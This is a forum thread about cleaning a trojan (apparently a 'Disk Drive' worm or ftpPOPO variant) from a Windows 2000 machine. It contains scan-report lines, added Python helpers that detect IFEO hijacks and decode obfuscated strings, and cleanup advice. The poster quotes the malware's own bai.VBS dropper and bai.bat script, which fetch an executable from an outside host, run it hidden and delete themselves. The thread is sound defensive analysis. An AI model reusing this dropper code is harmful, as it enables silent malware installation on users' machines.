O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\ddrawex.dll - Direct Draw Ex - 3c173d9de39c70822c87d11dd81ca79c
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\DDRAW.dll - Microsoft DirectDraw - dd3cec25bf4a9a9e09d95f75af8e110c
O40 - Explorer.EXE - 360.CN - E:\360safe\safemon\safemon.dll - 360安全卫士实时保护模块 - cb9d790910962bb51528fc208daa97b9
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\MSLS31.DLL - Microsoft Line Services library file - de21433576e98bf0439559400d2cec7d
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\webvw.dll - Shell WebView Content & Control Library - 83e5b3d918ca8cab3205c990e4cb2ccc
O40 - Explorer.EXE - Microsoft Corporation - C:\WINNT\system32\imgutil.dll - IE plugin image decoder support DLL - 9c7476c6e3d2e2e876e062f0ede22d11
O40 - svchost.exe - Microsoft Corporation - C:\WINNT\System32\ICMP.dll - ICMP DLL - 5e30628a4f5a02b80718aa46c92e00ae
O40 - rundll32.exe - Microsoft Corporation - C:\WINNT\system32\LZ32.DLL - LZ Expand/Compress API DLL - 51a5945c1e03a2d1761bcfd7e373d513

=======================================
O41 - ALCXSENS - Sensaura WDM 3D Audio Driver - C:\WINNT\system32\drivers\ALCXSENS.SYS - (running) - Sensaura WDM 3D Audio Driver - Sensaura - ba88534a3ceb6161e7432438b9ea4f54
O41 - DfsDriver - Windows NT Distributed File System Driver - C:\WINNT\system32\drivers\dfs.sys - (running) - Windows NT Distributed File System Driver - Microsoft Corporation - a1e84981288b5875ef4f8790a31b50a2
O41 - E100B - Intel(R) PRO/100 Adapter NDIS 5 driver - C:\WINNT\system32\drivers\e100bnt5.sys - (running) - Intel(R) PRO/100 Adapter NDIS 5 driver - Intel Corporation - d1ea591abc475dffdc34e0c8a1db0a36
O41 - Nbf - NetBEUI Frames Protocol Driver - C:\WINNT\system32\drivers\nbf.sys - (running) - NetBEUI Frames Protocol Driver - Microsoft Corporation - c833146f3758b29ccf100fc32dad6fc4
O41 - Parallel - Parallel Printer Driver - C:\WINNT\system32\drivers\parallel.sys - (running) - Parallel Printer Driver - Microsoft Corporation - db273d04cfb7d6b7ee0110c657c7dd14
O41 - RsAntiSpyware - RsBoot - C:\WINNT\system32\drivers\RsBoot.sys - (running) - RsBoot - Beijing Rising - 73e54c2429fb776e676977c512a85bd9
O41 - uhcd - Universal Host Controller Driver - C:\WINNT\system32\drivers\uhcd.sys - (running) - Universal Host Controller Driver - Microsoft Corporation - 376fb5e14b9d375db3536ba563eae97a
O41 - usbhub20 - Default Hub Driver for USB 2.0 - C:\WINNT\system32\drivers\usbhub20.sys - (running) - Default Hub Driver for USB 2.0 - Microsoft Corporation - b0205d19ba25ca654810d0aed04496a8
O41 - usbscan - USB Scanner Driver - C:\WINNT\system32\drivers\usbscan.sys - (running) - USB Scanner Driver - Microsoft Corporation - 6c0a98c98b84eee9e3fb1cf86b6250b8
O41 - VRVSYS - Windows NT/2K/XP File System Monitor - c:\bxy_vrv\filemon.sys - (running) - Windows NT/2K/XP File System Monitor - BXY - 57bbd677bdfc82a8ee05d6bc4300f451
O41 - GMSIPCI - GMSIPCI - F:\INSTALL\GMSIPCI.SYS - (not running) -  -  -
O41 - NetDetect - Network Card Detection driver - C:\WINNT\system32\drivers\netdtect.sys - (not running) - Network Card Detection driver - Microsoft Corporation - 9b2a6147a22f7e696cc7538283de6346
O41 - RCA - RCA filter - C:\WINNT\system32\drivers\rca.sys - (not running) - RCA filter - Microsoft Corporation - afce1f733a6aa3a90ac60794dfb26104
O41 - xyantivirus - Windows NT/2K/XP File System Monitor - C:\bxy_vrv\filemon.sys - (not running) - Windows NT/2K/XP File System Monitor - BXY - 57bbd677bdfc82a8ee05d6bc4300f451

=======================================
[userinit.exe情况]
MD5: 8ca97e8b3067a8a75f89fd6091258d05
文件大小: 17680
版本信息: 5.00.2195.6612
是否签名: 否!!!!!
未被感染

=======================================
[URL历史情况]


=======================================



[ This post was last edited by zhuwy1 on 2008-3-26 13:53 ]

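The "Image Execution" block in the report above is the image hijacking the original post describes: every security tool listed has an IFEO "Debugger" value of `ntsd -d`, and ctfmon.exe is pointed at SoundMan.exe. As an added example (not code from the thread), here is a small Python parser that reads those O31 lines and flags the hijacks; the sample lines are copied from the report, while the helper names and the allow-list of legitimate debuggers are assumptions, and on Windows it can also enumerate the live registry key.

```python
"""Flag Image File Execution Options (IFEO) hijacks in a 360安全卫士 report.

Added example, not code from the thread.  It parses the report's
"O31 - ... - Image Execution: <exe> - <debugger> - ..." lines (the layout in
the original post) and lists every program Windows has been told to start via a
"Debugger" command instead.  Sample lines are copied from the post; helper
names and the debugger allow-list are constructed.
"""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass

# A "Debugger" value under this key makes the loader run that command (with the
# original image as its argument) whenever the named executable is launched.
IFEO_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Debuggers a developer might register on purpose (constructed allow-list);
# anything else on an ordinary workstation deserves a look.
KNOWN_DEBUGGERS = ("vsjitdebugger.exe", "windbg.exe")

_LINE = re.compile(
    r"^O31 - .+? - Image Execution: (?P<exe>\S+) - (?P<debugger>.+?)(?: - |\s*$)"
)

@dataclass(frozen=True)
class Finding:
    exe: str       # image name the IFEO subkey is named after
    debugger: str  # command Windows will run in its place
    reason: str    # why the entry was flagged

def classify(exe: str, debugger: str) -> str | None:
    """Return a reason when the Debugger value looks like a hijack, else None."""
    dbg = debugger.strip().lower()
    if dbg.startswith("ntsd -d"):
        # Classic AV-killer value: the tool is started under ntsd in detached
        # mode, so it never shows up (or fails outright where ntsd is absent).
        return "security tool disabled via 'ntsd -d'"
    if any(dbg.endswith(k) for k in KNOWN_DEBUGGERS):
        return None
    if dbg.endswith(".exe") and not dbg.endswith(exe.lower()):
        # A system autostart (ctfmon.exe) pointed at another binary is
        # persistence: the substitute runs at every logon in its place.
        return f"launch of {exe} redirected to {debugger.strip()}"
    return "unexpected Debugger value"

def find_ifeo_hijacks(report_text: str) -> list[Finding]:
    """Scan a 360 report and return one Finding per suspicious IFEO entry."""
    findings = []
    for line in report_text.splitlines():
        m = _LINE.match(line.strip())
        if m and (reason := classify(m["exe"], m["debugger"])):
            findings.append(Finding(m["exe"], m["debugger"].strip(), reason))
    return findings

def live_ifeo_entries() -> dict[str, str]:
    """On Windows, read the real IFEO key: {image name: Debugger command}."""
    if sys.platform != "win32":
        return {}
    import winreg  # Windows-only module
    entries = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, IFEO_KEY) as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            name = winreg.EnumKey(root, i)
            try:
                with winreg.OpenKey(root, name) as sub:
                    entries[name] = winreg.QueryValueEx(sub, "Debugger")[0]
            except OSError:
                pass  # subkey with no Debugger value
    return entries

# Lines copied from the report in the original post.
SAMPLE_REPORT = """\
O31 - 未知 - Image Execution: 360rpt.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: 360safe.exe - ntsd -d -  -  -  - 0 -
O31 - 未知 - Image Execution: ctfmon.exe - C:\\WINNT\\SoundMan.exe - Realtek Semiconductor Corp. - Realtek Sound Manager - 5.1.0.28 - 67584 - e0584ee5e7f07f04a879b19a37465588
O31 - 未知 - Image Execution: SREng.EXE - ntsd -d -  -  -  - 0 -
"""

if __name__ == "__main__":
    for f in find_ifeo_hijacks(SAMPLE_REPORT):
        print(f"{f.exe:<12} -> {f.debugger:<24} {f.reason}")
    print("live IFEO entries:", live_ifeo_entries())
```

Removing the offending `Debugger` values (and deleting the subkeys named after the security tools) is what lets the blocked tools start again; the redirected ctfmon.exe entry also tells you which binary to look at next.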
zhuwy1 (Junior Netadmin)
Posted 2008-3-25 13:29
100 - 未知 - Process: rundll32.exe [Windows Shell Common Dll] - C:\WINNT\system32\rundll32.exe C:\WINNT\system32\shell32.dll,OpenAs_RunDLL C:\WINNT\help\bai.VBS -

I don't know what this entry is for:
The contents of bai.VBS are as follows:

on error resume next
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+"ps.gogo52o.com/rc/ttjj1/gx"+Chr(46)+Chr(106)+Chr(112)+Chr(103),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oshell.RUN "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),vbhide
oshell.RUN "cmd.exe /c del C:\WINNT\help\bai.VBS",vbhide




There is also a batch file, bai.bat, with the following contents:

del sss0.exe
ftp.exe -s:C:\WINNT\help\help.dll
if not exist sss0.exe sfd -s:C:\WINNT\help\help.dll
if not exist sss0.exe sft -s:C:\WINNT\help\help.dll
sss0.exe
sss0.exe
sss01.exe
sss01.exe
if not exist sss0.exe C:\WINNT\help\bai.VBS
:end
del C:\WINNT\help\help.dll
del C:\WINNT\help\bai.BAT
exit

[ This post was last edited by zhuwy1 on 2008-3-25 13:31 ]

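The bai.VBS quoted in this post hides its strings as Chr() chains, which is why it is hard to tell at a glance what it does. As an added example (not the poster's code), this Python helper folds the chains back into plain literals and lists the COM objects, URL, dropped file and commands for triage; the sample input is a subset of the script's own lines, and the function names are constructed.

```python
"""Resolve the Chr()-encoded literals in the bai.VBS dropper quoted above.

Added example, not code from the thread.  The script spells its COM class
names, download URL and dropped file name as Chr(n)+Chr(n)+... chains so that
a quick read or a naive string scan misses them.  This helper folds each chain
back into a plain literal and pulls out the triage-relevant facts; it never
executes anything.  Function names are constructed; the sample is a subset of
the script's own lines.
"""
from __future__ import annotations

import re

_CHR = re.compile(r"Chr\((\d+)\)")
# One Chr(n) or "quoted" piece, optionally followed by more joined with '+'.
# Assumes the page's '+' concatenation and no '+' inside quoted pieces.
_PIECE = r'(?:Chr\(\d+\)|"[^"]*")'
_CHAIN = re.compile(_PIECE + r"(?:\s*\+\s*" + _PIECE + r")*")

def decode_chain(chain: str) -> str:
    """Turn 'Chr(72)+"i"+Chr(33)' into the literal text Hi!."""
    out = []
    for piece in re.split(r"\s*\+\s*", chain):
        m = _CHR.fullmatch(piece)
        out.append(chr(int(m.group(1))) if m else piece.strip('"'))
    return "".join(out)

def deobfuscate(vbs: str) -> str:
    """Rewrite the script with every Chr() chain replaced by a quoted literal."""
    return _CHAIN.sub(lambda m: '"' + decode_chain(m.group(0)) + '"', vbs)

def extract_indicators(vbs: str) -> dict[str, list[str]]:
    """Decode the script and collect what an analyst wants to know first."""
    clear = deobfuscate(vbs)
    return {
        "com_objects": sorted(set(re.findall(r'CreateObject\s*\(\s*"([^"]+)"', clear, re.I))),
        "urls": re.findall(r'"(https?://[^"]+)"', clear),
        "dropped_files": re.findall(r'SaveToFile\s+"([^"]+)"', clear, re.I),
        "executed": re.findall(r'\.Run\s+"([^"]+)"', clear, re.I),
    }

# Lines taken from the bai.VBS posted above (subset used as demo input).
SAMPLE_VBS = r"""
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+"ps.gogo52o.com/rc/ttjj1/gx"+Chr(46)+Chr(106)+Chr(112)+Chr(103),Chr(48)
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.SaveToFile "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oshell.RUN "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),vbhide
oshell.RUN "cmd.exe /c del C:\WINNT\help\bai.VBS",vbhide
"""

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_VBS))
    for key, values in extract_indicators(SAMPLE_VBS).items():
        print(f"{key}: {values}")
```

The decoded view shows the pattern to look for on the other machines: an XMLHTTP fetch of a ".jpg" that is really an executable, written out through ADODB.Stream as sss0.exe, then run and the script deleted.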
红桃jacker (Moderator, 病毒木马 board)
Posted 2008-3-25 21:29
SREng got hijacked too?

zhuwy1 (Junior Netadmin)
Posted 2008-3-26 07:47
It should be. I've gotten rid of the malware, but I still don't know exactly which trojan it was.

yuan5422 (Apprentice Netadmin)
Posted 2008-3-26 09:01
Impressive!

zhuwy1 (Junior Netadmin)
Posted 2008-3-26 13:55
No problems after the reboot; the system is back to normal.

Recent ratings on this post:
红桃jacker 2008-3-26 14:31 MST币 +5 / BST币 +2: Good follow-through, thanks to the OP for coming back to reply. I searched Baidu yesterday, and some sources indicate this is a 磁碟机 (the "Disk Drive" worm) variant.
360安全卫士 (Partner)
Posted 2008-3-26 20:23
Hello everyone. Download the 360 repair tool, then start 360 and it will detect and remove this.
360's name for it is: ftpPOPO trojan.

zhuwy1 (Junior Netadmin)
Posted 2008-3-26 21:08


QUOTE:
Originally posted by 360安全卫士 on 2008-3-26 20:23
Hello everyone. Download the 360 repair tool, then start 360 and it will detect and remove this.
360's name for it is: ftpPOPO trojan.

A new one?
I did as you said (360安全卫士 really is good) and used other tools alongside it. Earlier I had restored an image (the machine was urgently needed) and it got infected again; after a careful scan I found the other drives were infected too, which is why the trojan kept coming back.

A few suggestions for everyone:

1. After cleaning the system drive (restoring an image, reinstalling the system, etc.), scan the other drives carefully as well so the cleanup is thorough and reinfection is avoided. Don't double-click to open a drive.
2. Combine several tools and antivirus products, plus manual cleanup, to get a satisfactory result.

冥王黑蒂斯
Posted 2008-3-27 13:12
360 didn't kill it for me...

懒惰的小虫子 (Apprentice Netadmin)
Posted 2008-3-27 16:23
I ran 360 to clean it and then reinstalled the system!! If the system has been infected, the GHOST image file on your hard disk will have been modified too!!! So it's best to reinstall the system from scratch!!!
